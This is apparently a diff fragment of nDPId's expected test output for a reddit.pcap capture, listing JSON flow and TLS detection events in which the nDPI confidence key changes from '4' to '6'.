00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
-01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
+01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
